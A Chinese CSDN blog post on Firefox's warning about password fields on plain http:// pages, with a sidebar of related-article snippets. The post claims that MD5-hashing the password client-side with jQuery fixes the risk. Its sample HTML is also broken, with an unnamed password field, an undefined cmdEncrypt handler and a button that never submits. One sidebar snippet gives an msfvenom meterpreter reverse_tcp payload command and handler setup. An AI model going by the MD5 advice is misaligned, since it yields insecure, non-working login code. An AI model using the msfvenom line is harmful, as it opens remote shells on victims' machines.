密码字段出现在一个不安全的 http:// 页面中。这是一个可能导致用户登录凭据被窃取的安全风险。

最新推荐文章于 2024-06-22 17:00:00 发布
最新推荐文章于 2024-06-22 17:00:00 发布
阅读量1.5w 收藏
点赞数
分类专栏: 常见错误及解决方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzme520/article/details/45093909
版权

大牛勿喷,有更好的方法盼请留言!


在火狐浏览器下, 在框架中对用户数据(用户名,密码)进行操作时,就可能会报:密码字段出现在一个不安全的 http:// 页面中。这是一个可能导致用户登录凭据被窃取的安全风险。

从而导致操作失败!

为什么会报个这错误呢! 密码字段 出现在一个不安全的 http:// 页面中!

因为现在提交的密码还是明文的,黑客们可以通过网络嗅探之类的技术,得到这个明文密码,从而导致密码失窃!

即然是明文密码,那么我们在提交数据之前就把密码加密,是不是就可以了呢!


<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>RSA Login Test</title>
    <script src="Scripts/jquery-1.4.1.js" type="text/javascript"></script>
    <script src="Scripts/jQuery.md5.js" type="text/javascript" ></script>
    <script type="text/javascript">
     $(document).ready(function () {
            $('#btnLogin').click(function () {
                var pwdMd5 = $.md5($("#txtpassword").attr("value"));
                $("#txtpassword").attr("value", pwdMd5);
            });
        })
    </script>

</head>
<body>
    <form action="Default.aspx" id="formLogin" method="post">
    <div>
        <div>
            User Name:
        </div>
        <div>
            <input id="txtUserName" name="txtUserName"  type="text" maxlength="16" />
        </div>
        <div>
            Password:
        </div>
        <div>
            <input id="txtpassword" type="password" maxlength="16" />
        </div>
        <div>
            <input id="btnLogin" type="button" value="Login" οnclick="return cmdEncrypt()" />
        </div>
    </div>
    <div>
    </div>
    </form>
</body>
</html>



湘龙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python+opencv获取视频并做人脸识别
gujiuhanla0154的博客
12-12 3372
最近自学python,因为之前从事过人脸识别的项目,所以一开始也是从人脸识别入手,菜鸟一枚,大牛勿喷 在手机上装一个ip摄像头,通过wifi将视频流传到电脑上,起两个子线程,主线程解码,一个子线程作识别,另一个子线程编码图像保存到本地   main.py __author__ = 'zhuzr' import queue import cv2 from view import * v...
Firefox将以HTTP明文发送密码的网站标注为不安全
weixin_34097242的博客
06-05 242
最新的Firefox Nightly版本出现了一项较大的改变,这对web世界而言可能也是向前迈进的重要一步。这一版Firefox浏览器将那些展示密码字段,但不以 HTTPS协议发送密码的网站标注为不安全。地址栏会出现一个锁划了一道杠的标志,用于警告用户若发送证书则可能会不安全。 如果点击这个图标,Firefox还会提供更多关于将这样的站点标注为不安全...
过来人对编程工作的小见解,大牛勿喷
FatWhiteCat的博客
09-18 384
本人接触到这个编程也有段时间了,第一次是因为没有工作,就到某个机构去进修了,感觉效果显著的,学会很多基础的知识。 之后就到了郑州的某一家外包公司,这也许是我最后悔的一段时间吧,到了之后开始面试,很简单分分钟过了,进去之后开始无尽的自己测,自己写,压根没人会去理会你,但是过段时间就会有经理过来看看,话说没出差感觉也是挺好的,但是好景不长,没过多长时间就开始被“卖”了,开始接各地的面试电话,各种的包...
访问网站显示不安全怎么办?教您不花一分钱解决!
最新发布
ZL_1618的博客
06-22 8010
访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。如果网站仅使用HTTP协议,数据传输没加密,因此会被浏览器标记为“不安全”。解决办法是启用HTTPS协议,给网站部署上数字安全证书,确保网址以“https://”开头,而不是“http://”网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。
界面跳转(大牛勿喷,本人在开发所认识到的小技巧)
Qi_lang的专栏
05-31 1031
一个项目添加滑动退出之后,如果不设置好rootView会导致滑动退出到登录界面。点击退出登录以后,要返回到登录界面,如果处理的不当,可能出现跳转不到登录界面的情况,或者不能跳转到登录界面,这个方法大家可以借鉴一下。 在AppDelegate.h里面这样写: LoginViewController *log = [[UIStoryboard storyboardWithName:@"
将spring boot项目打成war包项目部署到服务器上
qq_42190530的博客
02-19 1370
前言 也是第一次部署项目到服务器上,大牛勿喷。由于将项目部署到Linux系统上,所以最好是有可视化工具得东西,这样比较简单快捷。我这里用得是xshell和xftp,由于是war包,所以需要放在服务器上面,这里我选择得是tomcat服务器。本文用到得工具安装包我都放在了qq群里,如果有需要得话可以进群下载。 参考资料: https://blog.csdn.net/qq_37335220/art...
大牛勿喷,手下留情嘻嘻。第一次写博客哈哈哈哈哈,想用来记录自己的学习生涯
weixin_53357981的博客
03-17 70
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地地址 lport=端口 -f psh-reflection > /opt/search.ps1。设置payload的地址和端口都要和创建快捷shell的地址端口一样,否则会不行。创建快捷shell,然后把生成的文件放入/var/www/html/目录下,之后再打开apache2服务。进入exploit/multi/handler监听,然后虚拟机的win7打开快捷图标。工具:kali,win7。
LabVIEW可移植的密码登录程序用户管理程序,方便移植到自己的项目
07-14
在这个特定的案例,我们讨论的是一个基于LabVIEW的可移植密码登录程序用户管理程序。这个程序设计的目标是提供一种便捷的方式,让用户能够将其集成到自己的项目,实现安全的身份验证和用户管理功能。 首先,让...
软考信息安全工程师知识20.pdf
05-12
3. **伪装(Masquerade)**:攻击者冒充合法用户登录系统,获取不应有的访问权限,通常通过盗取或伪造身份验证凭据来实现。 4. **绕过控制(Bypassing Controls)**:攻击者寻找系统的漏洞,避开安全措施,如防火墙...
cms软件系统后台管理登录页面模板html下载
05-18
7. 安全性考虑:一个良好的登录页面应包括防止SQL注入和跨站脚本攻击的措施,还可能使用HTTPS协议来加密传输数据,保护用户的登录凭据不被窃取。 8. 用户体验:登录页面应简洁易用,表单布局清晰,错误提示明确,...
酷黑登录页面效果案例.zip
07-02
在IT行业,登录页面设计是用户体验的重要组成部分,尤其在网页和应用程序,它通常是用户与系统交互的第一步。"酷黑登录页面效果案例"是一个专为展示深色主题登录界面设计的示例,这种设计风格通常被称为“酷黑”...
用户登录和加密
10-19
例如,`01-用户登录和加密.xcodeproj`可能包含一个示例项目,演示了如何在iOS应用实现用户登录和加密功能。 总的来说,理解和熟练掌握用户登录和加密技术对于iOS开发者来说至关重要。确保用户数据安全是开发者的...
通过HTTP协议认证方式弹出用户名和密码对话框
u012925692的博客
08-09 1232
请求头部类似如下,Authorization: Digest username="xxxxx",realm="myTomcat",qop="auth",nonce= "xxxxx",uri="xxxx",cnonce="xxxxxx",nc=00000001,response="xxxxxxxxx",opaque="xxxxxxxxx"。④ 服务器端Web容器获取HTTP报文头部的相关认证信息,确认此用户名与密码是否正确,是否有相应资源的权限,如果认证成功,则返回相关资源,否则再执行步骤②,重新进行认证。
在线考试系统(Online Exam System)--ASP.NET
weixin_30823833的博客
09-16 8676
用户设计 -|学生 -|老师 -|管理员 学生结构设计 -|个人信息管理 -|修改个人信息 -|修改登录密码 -|选课心 -|显示所有老师所开课的信息可进行选课 -|显示自己已选课程 -|在线考试 -|对已选老师开设的课程选择进行考试 -|成绩查...
此链接不安全输入的登陆信息可能窃取
weixin_30555515的博客
05-19 871
火狐提示连接不安全,这是因为访问了非https协议的网站,做出的安全提示 每次输入登录信息,都有这样的提示,部分网站遮盖了输入框作. 个人认为作为浏览器不应该这么做,浏览器不应该增加页面区域内容, 是否安全,或者网址是否被认为危险,这些提示应该放到其他地方.即使有提示,也应允许用户选择是否下次继续提示. 在火狐菜单 工具 选项页面,也没有关闭这些提示的地方,所以只能转向到高...
HTTP的不安全以及安全HTTPS原理及流程
做技术,贵在学习与坚持!
06-23 2885
1、不安全HTTP** HTTP协议没有任何的加密以及身份验证的机制,非常容易遭到窃听、劫持、篡改等。不安全的原因主要包含以下三个方面: 通信使用明文,内容可能被窃听。 不验证通信方的身份,因此有可能遭到伪装。 无法验证报文的完整性,所以有可能被篡改。 传统的HTTP请求过程都是明文传输的,所谓的明文指的是没有经过加密的信息,如果HTTP请求和响应被黑客拦截,并且里面含有密码等敏感数据的话,会非常危险。 说明:由于HTTP本身不具备加密的功能,所以也无法做到对通信整体进行加密,HTTP报文使用明文方
Chrome 56 将输入密码HTTP 页面标记为不安全
weixin_34336292的博客
06-07 133
根据Google安全博客早些时候宣布的计划,从本月发布的Chrome 56起,将要求输入密码或信用卡号码的HTTP页面标记为不安全这是Google准备将所有HTTP页面都标记为不安全的长期计划的第一步。Google警告说,当用户通过HTTP连接访问一个页面,你的行为会被人监视,你访问的内容甚至可能遭到纂改。它督促网站从HTTP迁移到HTTPS。Chro...
Redis集群安全加固:弱/空密码整改指南
在Redis集群,确保密码安全性是至关重要的,因为这直接影响到数据的保护和系统的整体安全性。针对弱密码或空密码的情况,有以下两种整改步骤: 1. **弱密码整改**: - 使用具有足够权限的redis安装用户通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值